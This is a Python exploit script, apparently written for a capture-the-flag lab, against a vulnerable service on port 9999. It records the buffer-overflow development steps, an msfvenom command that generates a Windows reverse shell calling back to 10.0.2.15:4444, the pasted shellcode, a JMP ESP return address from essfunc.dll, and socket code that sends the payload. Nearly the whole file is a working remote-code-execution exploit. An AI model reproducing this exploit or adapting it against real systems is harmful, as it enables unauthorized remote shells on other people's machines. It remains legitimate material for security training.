
THM - Brainstorm

Exploit

#!/usr/bin/env python3
import socket, time, sys, subprocess

# Target of the exercise: host address and TCP port of the service under test.
# 10.0.2.4 is a private (RFC 1918) address.
ip, port = "10.0.2.4", 9999

#> buffer size 4096
# payload = (b"A" * 4096)
# payload = (b"A" * 4092)  + (b"B" * 4)

#> Create payload -> msf-pattern_create -l 4096
#> Search offset (EIP) -> msf-pattern_offset -l 4096 -q 31704330 -> 2012
# payload = (b"A" * 2012) + (b"B" * 4) + (b"C" * 2076) + (b"D" * 4)

#> badchar \x00
#> msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=4444 -b "\x00" -f python EXITFUNC=thread

# Generated shellcode, pasted from the output of the msfvenom command recorded in
# the comment above: a windows/shell_reverse_tcp payload set to connect back to
# LHOST 10.0.2.15 on LPORT 4444, generated with -b "\x00" so that the one bad
# character found for this service does not appear in it.
# NOTE(review): these are opaque bytes -- nothing in this file ties them to the
# recorded command, so what they do cannot be confirmed from the listing alone.
# Both buf and len(buf) are used further down when `payload` is assembled.
buf =  b""
buf += b"\xda\xcd\xba\x3a\x59\x28\xc6\xd9\x74\x24\xf4\x5d\x2b"
buf += b"\xc9\xb1\x52\x83\xed\xfc\x31\x55\x13\x03\x6f\x4a\xca"
buf += b"\x33\x73\x84\x88\xbc\x8b\x55\xed\x35\x6e\x64\x2d\x21"
buf += b"\xfb\xd7\x9d\x21\xa9\xdb\x56\x67\x59\x6f\x1a\xa0\x6e"
buf += b"\xd8\x91\x96\x41\xd9\x8a\xeb\xc0\x59\xd1\x3f\x22\x63"
buf += b"\x1a\x32\x23\xa4\x47\xbf\x71\x7d\x03\x12\x65\x0a\x59"
buf += b"\xaf\x0e\x40\x4f\xb7\xf3\x11\x6e\x96\xa2\x2a\x29\x38"
buf += b"\x45\xfe\x41\x71\x5d\xe3\x6c\xcb\xd6\xd7\x1b\xca\x3e"
buf += b"\x26\xe3\x61\x7f\x86\x16\x7b\xb8\x21\xc9\x0e\xb0\x51"
buf += b"\x74\x09\x07\x2b\xa2\x9c\x93\x8b\x21\x06\x7f\x2d\xe5"
buf += b"\xd1\xf4\x21\x42\x95\x52\x26\x55\x7a\xe9\x52\xde\x7d"
buf += b"\x3d\xd3\xa4\x59\x99\xbf\x7f\xc3\xb8\x65\xd1\xfc\xda"
buf += b"\xc5\x8e\x58\x91\xe8\xdb\xd0\xf8\x64\x2f\xd9\x02\x75"
buf += b"\x27\x6a\x71\x47\xe8\xc0\x1d\xeb\x61\xcf\xda\x0c\x58"
buf += b"\xb7\x74\xf3\x63\xc8\x5d\x30\x37\x98\xf5\x91\x38\x73"
buf += b"\x05\x1d\xed\xd4\x55\xb1\x5e\x95\x05\x71\x0f\x7d\x4f"
buf += b"\x7e\x70\x9d\x70\x54\x19\x34\x8b\x3f\x2c\xc9\x91\xb0"
buf += b"\x58\xcb\x95\xdf\xc4\x42\x73\xb5\xe4\x02\x2c\x22\x9c"
buf += b"\x0e\xa6\xd3\x61\x85\xc3\xd4\xea\x2a\x34\x9a\x1a\x46"
buf += b"\x26\x4b\xeb\x1d\x14\xda\xf4\x8b\x30\x80\x67\x50\xc0"
buf += b"\xcf\x9b\xcf\x97\x98\x6a\x06\x7d\x35\xd4\xb0\x63\xc4"
buf += b"\x80\xfb\x27\x13\x71\x05\xa6\xd6\xcd\x21\xb8\x2e\xcd"
buf += b"\x6d\xec\xfe\x98\x3b\x5a\xb9\x72\x8a\x34\x13\x28\x44"
buf += b"\xd0\xe2\x02\x57\xa6\xea\x4e\x21\x46\x5a\x27\x74\x79"
buf += b"\x53\xaf\x70\x02\x89\x4f\x7e\xd9\x09\x6f\x9d\xcb\x67"
buf += b"\x18\x38\x9e\xc5\x45\xbb\x75\x09\x70\x38\x7f\xf2\x87"
buf += b"\x20\x0a\xf7\xcc\xe6\xe7\x85\x5d\x83\x07\x39\x5d\x86"

# payload = (b"A" * 2012) + (b"B" * 4) + (b"C" * (2076 - len(buf))) + buf + (b"D" * 4)

# payload = (b"A" * 2012) + (b"B" * 4) + (b"\x90" * (2076 - len(buf))) + buf + (b"D" * 4)

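# The address for EIP can be found using mona (!mona modules and !mona jmp -r esp -cpb "\x00").
# essfunc.dll is not protected by ASLR, so its addresses stay the same from run to run; that makes it our best hit.
# A module built with ASLR (/DYNAMICBASE) would not offer such a stable address.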

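# Message sent to the service. As long as buf is no longer than 2076 bytes the
# total is 4096 bytes (2012 + 4 + 2076 + 4), the buffer size noted near the top
# of the script. Layout, in order:
#   1. 2012 filler bytes -- the offset at which msf-pattern_offset located EIP
#   2. 4 bytes that replace the saved return address with 0x625014df, stored
#      little-endian; per the mona note above it comes from essfunc.dll, the
#      module that is not protected by ASLR
#   3. 0x90 (NOP) padding sized so that padding + buf together fill 2076 bytes
#   4. buf, the generated shellcode
#   5. 4 trailing marker bytes
payload = b"".join((
    b"A" * 2012,
    b"\xdf\x14\x50\x62",
    b"\x90" * (2076 - len(buf)),
    buf,
    b"D" * 4,
))

# Show the final size and the raw bytes before anything is sent
# (label corrected from the misspelled "Pyadlod").
print("Payload size: {} payload: {}".format(len(payload), payload))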

#sys.exit(0)

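# Deliver the message to the service and report how the connection ended.
# Exchange as written: two reads (presumably a banner and the first prompt --
# confirm against the service), a short name, one more read, then the oversized
# message followed by a final read.
try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as conn:
        conn.settimeout(5)  # every blocking call below gives up after 5 seconds
        conn.connect((ip, port))
        conn.recv(1024)
        conn.recv(1024)
        conn.send(bytes("HACKER", "latin-1"))
        conn.recv(1024)
        print("Exploit with {} bytes".format(len(payload)))
        conn.send(payload)
        # A service that handled the message normally would answer here; a
        # timeout or reset lands in the handler below.
        conn.recv(1024)
except OSError as err:
    # Catch only socket-level failures (refused, reset, timed out) so that
    # Ctrl-C and coding errors are not reported as a network outcome. The
    # message names what actually happened instead of the old fuzzing-stage
    # wording; the exit status stays 0 as before.
    print("Connection ended with an error ({}); payload size {} bytes".format(err, len(payload)))
    sys.exit(0)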